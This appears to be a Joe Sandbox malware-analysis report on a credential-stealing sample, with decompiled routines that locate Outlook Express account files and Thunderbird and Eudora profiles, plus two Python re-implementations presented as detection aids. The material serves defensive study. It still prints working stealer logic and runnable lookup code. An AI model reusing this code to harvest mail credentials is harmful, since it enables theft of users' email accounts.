                                                                                                                                                    				_v292 = 0;
                                                                                                                                                    				memset( &_v291, 0, 0xff);
                                                                                                                                                    				_v548 = 0;
                                                                                                                                                    				memset( &_v547, 0, 0xff);
                                                                                                                                                    				_v1572 = 0;
                                                                                                                                                    				memset( &_v1570, 0, 0x1fe);
                                                                                                                                                    				_v1060 = 0;
                                                                                                                                                    				memset( &_v1058, 0, 0x1fe);
                                                                                                                                                    				_v36 = _a4 + 4;
                                                                                                                                                    				_a4 = 0;
                                                                                                                                                    				_v24 = 0xff;
                                                                                                                                                    				GetComputerNameA( &_v292,  &_v24); // executed
                                                                                                                                                    				_v24 = 0xff;
                                                                                                                                                    				GetUserNameA( &_v548,  &_v24); // executed
                                                                                                                                                    				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                                                                                    				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                                                                                    				_v32 = strlen( &_v292);
                                                                                                                                                    				_t88 = strlen( &_v548);
                                                                                                                                                    				_t113 = _v36;
                                                                                                                                                    				_v28 = _t88;
                                                                                                                                                    				memcpy(_t113,  &_v20, 0x10);
                                                                                                                                                    				_t91 = 0xba0da71d;
                                                                                                                                                    				if(_v28 > 0) {
                                                                                                                                                    					_t110 =  &_v1060;
                                                                                                                                                    					do {
                                                                                                                                                    						_t104 = _a4 & 0x80000003;
                                                                                                                                                    						if(_t104 < 0) {
                                                                                                                                                    							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                                                                                                    						_t91 = _t91 * 0xbc8f;
                                                                                                                                                    						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                                                                                                    						_a4 = _a4 + 1;
                                                                                                                                                    						_t110 =  &(_t110[1]);
                                                                                                                                                    					} while (_a4 < _v28);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v32 > _t92) {
                                                                                                                                                    					do {
                                                                                                                                                    						_t99 = _a4 & 0x80000003;
                                                                                                                                                    						if(_t99 < 0) {
                                                                                                                                                    							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                                                                                                    						_t91 = _t91 * 0xbc8f;
                                                                                                                                                    						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                                                                                                    						_a4 = _a4 + 1;
                                                                                                                                                    						_t92 = _t92 + 1;
                                                                                                                                                    					} while (_t92 < _v32);
                                                                                                                                                    				}
                                                                                                                                                    				return _t91;
                                                                                                                                                    			}

                                                                                                                                                    0x0040725d
                                                                                                                                                    0x00407268
                                                                                                                                                    0x0040726c
                                                                                                                                                    0x00407270
                                                                                                                                                    0x00407274
                                                                                                                                                    0x00407278
                                                                                                                                                    0x0040727c
                                                                                                                                                    0x00407280
                                                                                                                                                    0x00407284
                                                                                                                                                    0x00407288
                                                                                                                                                    0x0040728c
                                                                                                                                                    0x00407290
                                                                                                                                                    0x00407294
                                                                                                                                                    0x00407298
                                                                                                                                                    0x0040729c

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004072AE
                                                                                                                                                    • memset.MSVCRT ref: 004072C2
                                                                                                                                                    • memset.MSVCRT ref: 004072DC
                                                                                                                                                    • memset.MSVCRT ref: 004072F1
                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                                                                    • strlen.MSVCRT ref: 00407364
                                                                                                                                                    • strlen.MSVCRT ref: 00407373
                                                                                                                                                    • memcpy.MSVCRT ref: 00407385
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                    • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                                                                    • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                                                                                    • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                                                                    • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 378 406ec3-406ecc 379 406ece-406eed FindFirstFileA 378->379 380 406eef-406f03 FindNextFileA 378->380 381 406f0a-406f0f 379->381 382 406f11-406f3f strlen * 2 380->382 383 406f05 call 406f5b 380->383 381->382 385 406f54-406f5a 381->385 386 406f41-406f4c call 4062ad 382->386 387 406f4e 382->387 383->381 389 406f51-406f53 386->389 387->389 389->385
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406EC3(void** __eax) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				int _t16;
                                                                                                                                                    				int _t17;
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				void** _t38;
                                                                                                                                                    				void** _t40;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    
                                                                                                                                                    				_t40 = __eax;
                                                                                                                                                    				_t15 =  *__eax;
                                                                                                                                                    				if(_t15 != 0xffffffff) {
                                                                                                                                                    					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                                                                                                                    					 *(_t45 + 4) = _t16;
                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                    						goto L5;
                                                                                                                                                    					} else {
                                                                                                                                                    						E00406F5B(_t40);
                                                                                                                                                    						goto L4;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                                                                                                                    					 *_t40 = _t26;
                                                                                                                                                    					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                                                                                                                    					L4:
                                                                                                                                                    					if( *(_t45 + 4) != 0) {
                                                                                                                                                    						L5:
                                                                                                                                                    						_t38 =  &(_t40[0xa2]);
                                                                                                                                                    						_t28 =  &(_t40[0x5d]);
                                                                                                                                                    						_t41 =  &(_t40[0xf3]);
                                                                                                                                                    						_t17 = strlen( &(_t40[0xf3]));
                                                                                                                                                    						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                                                                                                                    							 *_t38 = 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							E004062AD(_t38, _t41, _t28);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return  *(_t45 + 4);
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                                                                                    • strlen.MSVCRT ref: 00406F27
                                                                                                                                                    • strlen.MSVCRT ref: 00406F2F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                    • String ID: rA
                                                                                                                                                    • API String ID: 379999529-474049127
                                                                                                                                                    • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                                                                    • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                                                                                    • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                                                                    • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E00401E8B(void* __eflags, char* _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				int _v12;
    void _v275;
    char _v276;
    void _v539;
    char _v540;
    void _v795;
    char _v796;
    void _v1059;
    char _v1060;
    void _v1323;
    char _v1324;
    void _v2347;
    char _v2348;
    void* __edi;
    void* __esi;
    int _t65;
    char* _t69;
    char _t70;
    int _t71;
    char _t75;
    void* _t76;
    long _t78;
    void* _t83;
    int _t85;
    void* _t87;
    int _t104;
    int _t108;
    char _t126;
    void* _t137;
    void* _t139;
    char* _t157;
    char* _t158;
    char* _t160;
    int _t161;
    void* _t164;
    CHAR* _t169;
    char* _t170;
    void* _t171;
    void* _t172;
    void* _t173;
    void* _t174;
    void* _t175;

    // Analyst notes (inferred from usage, not from symbols): _a4 is an output buffer holding four
    // 0x105-byte strings at offsets 0, 0x105, 0x20a and 0x30f. E0040EE59(buf, 0x1a) resolves a
    // shell folder; 0x1a is CSIDL_APPDATA. E004062AD joins two path components, and E0040614B
    // behaves like an existence check, since a zero result makes the caller blank the buffer.
    _v540 = 0;
    memset( &_v539, 0, 0x104);
    _t164 = 0x1a;
    E0040EE59( &_v540, _t164); // executed
    _t65 = strlen("Mozilla\\Profiles");
    _t6 = strlen( &_v540) + 1; // 0x1
    _t172 = _t171 + 0x14;
    if(_t65 + _t6 >= 0x104) { // would exceed MAX_PATH: leave slot 0 empty
        _t69 = _a4;
         *_t69 = 0;
        _t157 = _t69;
    } else {
        _t157 = _a4;
        E004062AD(_t157,  &_v540, "Mozilla\\Profiles"); // slot 0: %APPDATA%\Mozilla\Profiles
    }
    _t70 = E0040614B(_t157);
    if(_t70 == 0) {
         *_t157 = _t70;
    }
    _t158 = _t157 + 0x105;
    _t71 = strlen("Thunderbird\\Profiles");
    _t12 = strlen( &_v540) + 1; // 0x1
    if(_t71 + _t12 >= 0x104) {
         *_t158 = 0;
    } else {
        E004062AD(_t158,  &_v540, "Thunderbird\\Profiles"); // slot 0x105: %APPDATA%\Thunderbird\Profiles
    }
    _t75 = E0040614B(_t158);
    _pop(_t137);
    if(_t75 == 0) {
         *_t158 = _t75;
    }
    _t160 = _a4 + 0x20a;
    // slot 0x20a: Eudora command line, HKCU (0x80000001) first, then HKLM (0x80000002)
    _t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
    _t173 = _t172 + 0xc;
    if(_t76 == 0) {
        // the value name for the HKLM lookup is a string pointer (0x412466) the listing does not resolve
        _t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
        _t173 = _t173 + 0xc;
        if(_t126 == 0) {
             *_t160 = _t126;
        }
    }
    _v8 = _v8 & 0x00000000;
    // slot 0x30f: Thunderbird install directory, from HKLM\Software\Mozilla\Mozilla Thunderbird
    _t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
    _t174 = _t173 + 0xc;
    if(_t78 != 0) {
        L32:
        _t169 = _a4 + 0x30f;
        if( *_t169 != 0) {
            L35:
            return _t78;
        }
        // registry gave nothing: fall back to %programfiles%\Mozilla Thunderbird if it exists
        ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
        _t78 = E0040614B(_t169);
        if(_t78 != 0) {
            goto L35;
        }
         *_t169 = _t78;
        return _t78;
    } else {
        _v796 = _t78;
        _t161 = 0;
        memset( &_v795, 0, 0xff);
        _v12 = 0;
        _t83 = E0040EC05(_v8, 0,  &_v796); // enumerate subkeys by index into _v796
        _t175 = _t174 + 0x18;
        if(_t83 != 0) {
            L31:
            _t78 = RegCloseKey(_v8);
            goto L32;
        }
        _t170 = "sqlite3.dll";
        do {
            _t85 = atoi( &_v796);
            _pop(_t139);
            if(_t85 < 3) { // only version subkeys whose leading number is >= 3
                goto L28;
            }
            _v2348 = 0;
            memset( &_v2347, _t161, 0x3ff);
            _v276 = 0;
            memset( &_v275, _t161, 0x104);
            sprintf( &_v2348, "%s\\Main",  &_v796);
            E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104); // read <version>\Main\Install Directory
            _t175 = _t175 + 0x38;
            if(_v276 != 0 && E0040614B( &_v276) != 0) {
                _v1060 = 0;
                memset( &_v1059, _t161, 0x104);
                _v1324 = 0;
                memset( &_v1323, _t161, 0x104);
                _t104 = strlen(_t170);
                _t41 = strlen( &_v276) + 1; // 0x1
                _t175 = _t175 + 0x20;
                if(_t104 + _t41 >= 0x104) {
                    _v1060 = 0;
                } else {
                    E004062AD( &_v1060,  &_v276, _t170); // <install dir>\sqlite3.dll
                }
                _t108 = strlen("nss3.dll");
                _t47 = strlen( &_v276) + 1; // 0x1
                if(_t108 + _t47 >= 0x104) {
                    _v1324 = 0;
                } else {
                    E004062AD( &_v1324,  &_v276, "nss3.dll"); // <install dir>\nss3.dll
                }
                // accept the install only if both DLLs are present (they are needed to read the profile store)
                if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                    _t161 = 0;
                    goto L28;
                } else {
                    strcpy(_a4 + 0x30f,  &_v276);
                    goto L31;
                }
            }
            L28:
            _v12 = _v12 + 1;
            _t87 = E0040EC05(_v8, _v12,  &_v796);
            _t175 = _t175 + 0xc;
        } while (_t87 == 0);
        goto L31;
    }
}
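The listing above is hard to follow because of the stack-offset names and the unresolved helper calls. The Python below is an added re-implementation of that lookup logic, written for this page; it is not code from the sample and not from Joe Sandbox. The roles of E0040EE59, E0040614B, E00401C97, E0040EBC1 and E0040EC05 are inferred from how their results are used and are modelled by the callables passed in, and all registry and filesystem contents are constructed for the demonstration. It reproduces the four output slots, the MAX_PATH guard, the C atoi version filter and the %programfiles% fallback, so a detection engineer can see exactly which keys and files this harvester touches.

```python
import re

MAX_PATH = 0x104   # 260: size of every path buffer in the listing
SLOT = 0x105       # stride between the four output strings written into _a4

# Registry locations the function reads, as they appear in the listing.
EUDORA_KEYS = (
    ("HKCU", r"Software\Qualcomm\Eudora\CommandLine", "current"),
    # The value name for this second lookup is a string pointer (0x412466)
    # that the listing does not resolve, so it is passed through as None.
    ("HKLM", r"Software\Classes\Software\Qualcomm\Eudora\CommandLine\current", None),
)
THUNDERBIRD_KEY = ("HKLM", r"Software\Mozilla\Mozilla Thunderbird")


def c_atoi(s):
    """C atoi(): optional leading whitespace and sign, then digits; 0 if none."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def join_if_fits(base, leaf):
    """The strlen guard around E004062AD: base\\leaf, or "" if it would not fit in 0x104 bytes."""
    if len(leaf) + len(base) + 1 >= MAX_PATH:
        return ""
    return base + "\\" + leaf


def locate_mail_clients(appdata, read_value, enum_subkeys, exists, programfiles):
    """Return {offset: string} for the four slots the function fills in _a4.

    appdata      -- what E0040EE59(buf, 0x1a) yields; 0x1a is CSIDL_APPDATA
    read_value   -- (hive, key, value_name) -> str or None, the role of E00401C97 / E0040EBC1
    enum_subkeys -- (hive, key) -> subkey names in registry order (the E0040EC05 loop)
    exists       -- path -> bool, the role inferred for E0040614B (its failure zeroes the buffer)
    """
    out = {}
    # slots 0 and 0x105: candidate profile directories under %APPDATA%
    for slot, leaf in ((0, r"Mozilla\Profiles"), (SLOT, r"Thunderbird\Profiles")):
        p = join_if_fits(appdata, leaf)
        out[slot] = p if p and exists(p) else ""
    # slot 0x20a: Eudora command line, HKCU first, HKLM fallback, else empty
    eudora = ""
    for hive, key, value in EUDORA_KEYS:
        eudora = read_value(hive, key, value) or ""
        if eudora:
            break
    out[0x20a] = eudora
    # slot 0x30f: Thunderbird install dir from HKLM, needing version >= 3 and both DLLs
    found = ""
    for sub in enum_subkeys(*THUNDERBIRD_KEY):
        if c_atoi(sub) < 3:          # skips "bin", "CurrentVersion" and 2.x entries
            continue
        inst = read_value("HKLM", THUNDERBIRD_KEY[1] + "\\" + sub + r"\Main", "Install Directory") or ""
        if not inst or not exists(inst):
            continue
        sqlite = join_if_fits(inst, "sqlite3.dll")
        nss = join_if_fits(inst, "nss3.dll")
        if sqlite and nss and exists(sqlite) and exists(nss):
            found = inst
            break
    if not found:                    # label L32: %programfiles%\Mozilla Thunderbird as last resort
        cand = programfiles + r"\Mozilla Thunderbird"
        found = cand if exists(cand) else ""
    out[0x30f] = found
    return out


# Constructed inputs (not from the sample's environment) to exercise the model.
FAKE_APPDATA = r"C:\Users\alice\AppData\Roaming"
FAKE_PROGRAMFILES = r"C:\Program Files"
FAKE_FS = {
    FAKE_APPDATA + r"\Thunderbird\Profiles",
    r"C:\Program Files\Mozilla Thunderbird",
    r"C:\Program Files\Mozilla Thunderbird\sqlite3.dll",
    r"C:\Program Files\Mozilla Thunderbird\nss3.dll",
    r"C:\Old Thunderbird",
    r"C:\Old Thunderbird\sqlite3.dll",
    r"C:\Old Thunderbird\nss3.dll",
}
FAKE_VALUES = {
    ("HKLM", r"Software\Mozilla\Mozilla Thunderbird\2.0.0.24 (en-US)\Main", "Install Directory"): r"C:\Old Thunderbird",
    ("HKLM", r"Software\Mozilla\Mozilla Thunderbird\3.1.20 (en-US)\Main", "Install Directory"): r"C:\Program Files\Mozilla Thunderbird",
}
FAKE_SUBKEYS = {THUNDERBIRD_KEY: ["2.0.0.24 (en-US)", "3.1.20 (en-US)", "bin"]}


def demo():
    """Run the model against the constructed registry and filesystem above."""
    return locate_mail_clients(
        FAKE_APPDATA,
        lambda hive, key, value: FAKE_VALUES.get((hive, key, value)),
        lambda hive, key: FAKE_SUBKEYS.get((hive, key), []),
        lambda path: path in FAKE_FS,
        FAKE_PROGRAMFILES,
    )
```

With the constructed data, slot 0 stays empty (no Mozilla\Profiles directory), slot 0x105 resolves to the Thunderbird profile directory, slot 0x20a stays empty (no Eudora keys) and slot 0x30f selects the 3.1.20 install even though the 2.0.0.24 install also has both DLLs, because atoi("2.0.0.24 (en-US)") is 2. For monitoring, the interesting events are a non-Thunderbird process opening HKLM\Software\Mozilla\Mozilla Thunderbird and then probing sqlite3.dll and nss3.dll in the install directory.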
Address column for the listing above (from the report's side-by-side view): instruction addresses run from 0x00401ea6 to 0x004021d5 within this section.
                                                                                                                                                    0x004021be
                                                                                                                                                    0x004021c5
                                                                                                                                                    0x004021cd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004021cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401fbe
                                                                                                                                                    0x00401fc3
                                                                                                                                                    0x00401fc9
                                                                                                                                                    0x00401fd3
                                                                                                                                                    0x00401fe3
                                                                                                                                                    0x00401fe6
                                                                                                                                                    0x00401feb
                                                                                                                                                    0x00401ff0
                                                                                                                                                    0x004021a0
                                                                                                                                                    0x004021a3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004021a3
                                                                                                                                                    0x00401ff6
                                                                                                                                                    0x00401ffb
                                                                                                                                                    0x00402002
                                                                                                                                                    0x0040200a
                                                                                                                                                    0x0040200b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040201e
                                                                                                                                                    0x00402025
                                                                                                                                                    0x00402033
                                                                                                                                                    0x0040203a
                                                                                                                                                    0x00402052
                                                                                                                                                    0x0040206e
                                                                                                                                                    0x00402073
                                                                                                                                                    0x0040207d
                                                                                                                                                    0x004020a1
                                                                                                                                                    0x004020a8
                                                                                                                                                    0x004020b6
                                                                                                                                                    0x004020bd
                                                                                                                                                    0x004020c3
                                                                                                                                                    0x004020d6
                                                                                                                                                    0x004020da
                                                                                                                                                    0x004020df
                                                                                                                                                    0x004020f8
                                                                                                                                                    0x004020e1
                                                                                                                                                    0x004020ef
                                                                                                                                                    0x004020f5
                                                                                                                                                    0x00402104
                                                                                                                                                    0x00402117
                                                                                                                                                    0x0040211f
                                                                                                                                                    0x0040213c
                                                                                                                                                    0x00402121
                                                                                                                                                    0x00402133
                                                                                                                                                    0x00402139
                                                                                                                                                    0x00402152
                                                                                                                                                    0x00402165
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402189
                                                                                                                                                    0x00402199
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040219f
                                                                                                                                                    0x00402152
                                                                                                                                                    0x00402167
                                                                                                                                                    0x00402167
                                                                                                                                                    0x00402177
                                                                                                                                                    0x0040217c
                                                                                                                                                    0x0040217f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402187

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00401EAD
                                                                                                                                                    • strlen.MSVCRT ref: 00401EC6
                                                                                                                                                    • strlen.MSVCRT ref: 00401ED4
                                                                                                                                                    • strlen.MSVCRT ref: 00401F1A
                                                                                                                                                    • strlen.MSVCRT ref: 00401F28
                                                                                                                                                    • memset.MSVCRT ref: 00401FD3
                                                                                                                                                    • atoi.MSVCRT ref: 00402002
                                                                                                                                                    • memset.MSVCRT ref: 00402025
                                                                                                                                                    • sprintf.MSVCRT ref: 00402052
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • memset.MSVCRT ref: 004020A8
                                                                                                                                                    • memset.MSVCRT ref: 004020BD
                                                                                                                                                    • strlen.MSVCRT ref: 004020C3
                                                                                                                                                    • strlen.MSVCRT ref: 004020D1
                                                                                                                                                    • strlen.MSVCRT ref: 00402104
                                                                                                                                                    • strlen.MSVCRT ref: 00402112
                                                                                                                                                    • memset.MSVCRT ref: 0040203A
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                    • API String ID: 2492260235-4223776976
                                                                                                                                                    • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                                                                                    • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                                                                                    • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                                                                                    • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
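The strings and API calls listed for this function (registry keys under Software\Mozilla\Mozilla Thunderbird and Software\Qualcomm\Eudora\CommandLine, the "%s\Main" / "Install Directory" value, the %programfiles%\Mozilla Thunderbird fallback expanded with ExpandEnvironmentStringsA and verified with GetFileAttributesA, and the nss3.dll / sqlite3.dll names) describe how the password-recovery component locates a mail client before loading its crypto libraries. The Python below is an added model of that lookup, written for this page and not code from the sample or from the Joe Sandbox report. The order of the lookups and the version-subkey handling (highest numeric subkey first, mirroring the atoi call) are assumptions reconstructed from the listing; the registry and filesystem are constructed in-memory stand-ins, and every key and path the lookup touches is recorded so the output doubles as the list a defender would put under registry and file-access auditing.

```python
import re

# Strings from the listing above (registry keys, value names, fallback path, DLLs).
THUNDERBIRD_KEY = r"Software\Mozilla\Mozilla Thunderbird"
THUNDERBIRD_FALLBACK = r"%programfiles%\Mozilla Thunderbird"
EUDORA_KEY = r"Software\Qualcomm\Eudora\CommandLine"
NSS_DEPS = ("nss3.dll", "sqlite3.dll")


def expand_env(s, env):
    """Stand-in for ExpandEnvironmentStringsA: replace %NAME% tokens, case-insensitively."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lookup.get(m.group(1).lower(), m.group(0)), s)


class FakeRegistry:
    """Constructed in-memory registry: key path -> {value name: data}.
    Every key queried is recorded in .probed; that list is what a defender
    would turn into registry-access audit rules."""

    def __init__(self, keys):
        self.keys = {k.lower(): v for k, v in keys.items()}
        self.probed = []

    def query_value(self, key, name):
        self.probed.append(key)
        return self.keys.get(key.lower(), {}).get(name)

    def subkeys(self, key):
        self.probed.append(key)
        prefix = key.lower() + "\\"
        names = {k[len(prefix):].split("\\")[0] for k in self.keys if k.startswith(prefix)}
        return sorted(names)


def _version_rank(name):
    """atoi-style ordering: leading integer of the subkey name, 0 if absent (assumption)."""
    m = re.match(r"\d+", name)
    return int(m.group(0)) if m else 0


def thunderbird_install_dir(reg, env, file_exists):
    """Return the first directory that actually holds nss3.dll and sqlite3.dll.
    Assumed order: '<key>\\<version>\\Main' -> 'Install Directory' for each version
    subkey (highest first), then the %programfiles% fallback; each candidate is
    checked with a file-attributes probe, as GetFileAttributesA is in the listing."""
    candidates = []
    for ver in sorted(reg.subkeys(THUNDERBIRD_KEY), key=_version_rank, reverse=True):
        d = reg.query_value("%s\\Main" % (THUNDERBIRD_KEY + "\\" + ver), "Install Directory")
        if d:
            candidates.append(d)
    candidates.append(expand_env(THUNDERBIRD_FALLBACK, env))
    for d in candidates:
        if all(file_exists(d + "\\" + dll) for dll in NSS_DEPS):
            return d
    return None


def eudora_command_line(reg):
    """Read value 'current' under the Eudora CommandLine key (both strings are in the listing)."""
    return reg.query_value(EUDORA_KEY, "current")


def demo():
    """Constructed sample host (not data from the analysed machine)."""
    reg = FakeRegistry({
        r"Software\Mozilla\Mozilla Thunderbird\91.5.0\Main": {"Install Directory": r"D:\Apps\Thunderbird"},
        r"Software\Qualcomm\Eudora\CommandLine": {"current": r"C:\Eudora\Eudora.exe"},
    })
    env = {"ProgramFiles": r"C:\Program Files"}
    present = {r"D:\Apps\Thunderbird\nss3.dll", r"D:\Apps\Thunderbird\sqlite3.dll"}
    checked = []

    def file_exists(path):
        checked.append(path)
        return path in present

    return {
        "thunderbird": thunderbird_install_dir(reg, env, file_exists),
        "eudora": eudora_command_line(reg),
        "registry_probed": reg.probed,
        "files_checked": checked,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Run stand-alone, demo() resolves the Thunderbird directory from the registry and then reports the keys and paths that were touched; with an empty registry the same function falls through to the expanded %programfiles% path, and returns None when neither location holds both DLLs. Those two registry keys and the file-attribute probes on nss3.dll and sqlite3.dll from a process that is not a mail client are the observable footprint of this routine.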

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                    				char* _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr _v16;
